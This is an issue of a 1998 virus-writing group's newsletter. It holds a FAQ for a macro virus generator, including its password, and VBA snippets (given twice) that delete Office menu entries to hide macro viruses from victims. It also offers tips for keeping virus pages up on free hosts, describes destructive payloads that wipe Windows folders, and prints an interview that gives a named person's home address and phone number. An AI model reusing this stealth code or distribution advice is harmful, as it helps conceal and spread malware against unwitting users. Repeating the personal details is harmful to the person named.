                 \ Issue #1/week#1 may 98 /
                  /      NVT 1998        \
   i. Intro ................................[1]
  ii. NEG FAQ ..............................[2]
 iii. Tips and Tricks ......................[3]
  iv. New Viruses ..........................[4]
   v. Interview ............................[5]
  vi. Virus Survival Theory ................[6]
 vii. Greet and thanx ......................[7]
viii. Send an articles .....................[8]
>>>>>>>>>------------[1]---------------------------------->>>
i. Intro
   Welcome to the first issue of NoMercyVirusTeam!, we as the 
   biggest Virus Team from Indonesia, and the most active Virus 
   Team from Asia a want try to provide in sort info about VX 
   move in Weekly base, why? bcos this more efficien than ezine
   that release in 2-3 month, like you know our tech always
   grow every SECONDS.
   now... go on guys
   foxz 
   icq#11605604

>>>>>>>>>------------[2]---------------------------------->>>
ii. NEG FAQ   
    Author: foxz

    Day by day after NEG release i got many respons,
    greets, questions and permissions to distribute NEG
    by this issue i want give answers of NEG

        Q: What the Password
        A: password for NEG = #virus

        Q: Can i use NEG on Excel 97?
        A: Yes you can, want prove?? take a look "Lord"
           and "Dollar"

        Q: The stealth method not work on NEG :o(
        A: mmm, you use Excel97 don't you ?
           use this code :
           <!----cut here-----!>
           CommandBars("tools").Controls("Macro").Delete
           CommandBars("tools").Controls("Customize...").Delete
           CommandBars("view").Controls("Toolbars").Delete
           CommandBars("view").Controls("Status Bar").Delete
           CommandBars("window").Controls("Unhide...").Delete
           <!----end here-----!>
           Remember victims still see your code by pressing
           "alt+F11" and till now i still search how to fuck
           out alt+F11

        Q: How to make it be? (make with X97?)
        A: well, this is the funny question :o) after you
           insert the code, then close VBA Editor, Save As
           Excel to 95 version, exit excel then open it again.

        Q: I hear the rumor NEG Have easter eggs, that's true?
        A: yup, i make three secrets, one of them is on about.
           just set date 13 (any month) select help/about then 
           click radiation symbols on the left one.

        Q: Have plan to make for version 2?
        A: i'm (foxz) to lazy to continue for version 2
           i just want the first man who make generator for EXCEL

        Q: where i can get NEG if NoMercy Page down?
        A: 1. Aurodreph page http://www.ilf.net/AURODREPH
           2. Cicatrix's site http://www.cyberstation.net/~cicatrix
           3. SlageHammer via email at slagehamer@usa.net

        Q: may i distribute NEG
        A: as long as you distribute for free go ahead :o)
        
>>>>>>>>>------------[3]---------------------------------->>>
iii. Tips and Tricks
     Author: foxz and Slage
     
     1. how to fuck out cencorship from free web. (by foxz)
        - like you know much free web doesnt allow HPVAC
          page on their domain, for sample geocities and XOOM.
          they will delete the page without give any chance to
          US.
          
          Now time for fuck them all guys!, how ??, follow this
          trick:

          index.htm(l) is the main page for your page this is 
          the key!, make index.htm(l) with comment "we move"
          or something like that, and change your main page
          to index2.html or whatever you want i garranty that
          will work well wanna prove ?? take alook our "ware
          house" on geocities.com.
"http://www.geocities.com/ResearchTriangle/Lab/1220/index.html"

          That page still active till now (over 7 month!)
      
     2. Stealth on VBA Word and EXCEL (by slagehammer)
        this is the extreme stealth method for hide your virus
        one thing you must remember, user still allow to use
        alt+F11 :o(

         - For EXCEL97
           <!----cut here-----!>
           CommandBars("tools").Controls("Macro").Delete
           CommandBars("tools").Controls("Customize...").Delete
           CommandBars("view").Controls("Toolbars").Delete
           CommandBars("view").Controls("Status Bar").Delete
           CommandBars("window").Controls("Unhide...").Delete
           <!----end here-----!>

         - for Word97
           <!----cut here-----!>
           CommandBars("tools").Controls("Macro").Delete
           CommandBars("tools").Controls("Customize...").Delete
           CommandBars("tools").Controls("Templates and 
           Add-Ins...").Delete
           CommandBars("view").Controls("Toolbars").Delete
           <!----end here-----!>


>>>>>>>>>------------[4]---------------------------------->>>
iv. New Viruses

       * XM97.Riots created by the leader or NoMercyVirusTeam
         short info:
         - infect X97
         - delete active sheet on day 13 every month
         - message text encripted with ROT13 

       * WM97.Satan666 created by Mikee
         short info:
         - infect W97
         - on June <ahem> or try distrub this virus, the virus will
           try to delete all files on
             c:\windows\*.*
             c:\windows\system\*.*
             c:\My Documents
           and do some modified on autoexec.bat 
         - This virus just FUCKOUT NeuralNetwork of HMVS 2.60e

        * X/W. Stranger Days created by Reptile/29A 
         short info:
         - infect W97 and X97
         - on Day 26 delete all file in active folder
         - drop some files called :
             start.bat
             a.scr (become personal.xls.dot)
             b.scr (become normal.dot)
         - This virus FUCKOUT NeuralNetwork of HMVS 2.60e TOO :o)

>>>>>>>>>------------[5]---------------------------------->>>
v. Interview
        This time we make interview with Mikee the first Asian 
        virus writer thats fuck out HMVS 260e with his Satan666

        1. discribe your self 
           -i'm cool and i have no rules attached to myself. 
            i do what i want to do and i like mingling with 
            other people like you :) 

        2. where did you get your handel, what the mean? 
           -well, here in the philippines, we have three major 
            island groups. Luzon, Visayas, and Mindanao. I live
            in the visayas area and there Mike is oftentimes 
            called Mikee. It actually doesn't mean anything but 
            I like it because it sounds sweeter and cooler than 
            Mike. 

        3. how long you has been active on VX? 
           -for about 4 years (on and off) 

        4. did you ever write virus, what the name and where your fav 
           -yes. most of them are newer versions of old ones. One of 
            them, V1, a virus i left in the wild and undocumented is 
            the one i like most. Some may call it a "lamer's virus" 
            but it survived in the systems it was designed to live. 
            It's a non-overwriting COM infector and it's not even 
            memory resident. I like it because it's my first succesful
            virus. 

        5. what programming lang. you know 
           -ASM and Basic. Never focused on C and Pascal. 

        6. Your betha of satan666 is very kewl HMVS can't detect it, 
           tell me story behind the making of satan666 
           -Thanks for the compliments about Satan666. It's actually 
            my fourth Macro Virus (of the same gen) and as of now, I 
            never know anything about Macro stealth techniques except 
            for toolsmacro and toolsoptions :). well, the story behind
            it is in it's name. to let the world know, i'm satanist 
            and i think it is my WILL that created and made Satan666 
            the virus that you say. :) 

        7. how did you start out in VX 
           -Damn, the virus i encountered was the 15xx virus. It was 
            often detected by McAfee. I then started to become 
            interested in virii. I bought books about it and began to
            learn. 

        8. who are you in the real life? 
           -I don't see any reason to hide myself so here i am. My 
            true name is Michael John G. Lopez, living at U-115 
            Christopher Plaza Bldg., Quirino Highway, LAGRO, 
            Novaliches City, Philippines. If you want to contact me 
            by phone, my telefax is (632) 4191374. I work as layout 
            artist, programmer, and anything about computers. 21 years
            old birthday is March 18
            (so watch out for March 18 triggers :)) 

        9. what your view about vck? 
           -they're fine 'coz they help beginners to have a good
            start. the problem with vck's is that when the AV people 
            begin to know about it, all virii it produces can then
            easily be detected.
 
       10. should virus be illegal? 
           -some say so but i don't think so. hard to explain. 

>>>>>>>>>------------[continue to ....]--------------------------->>>
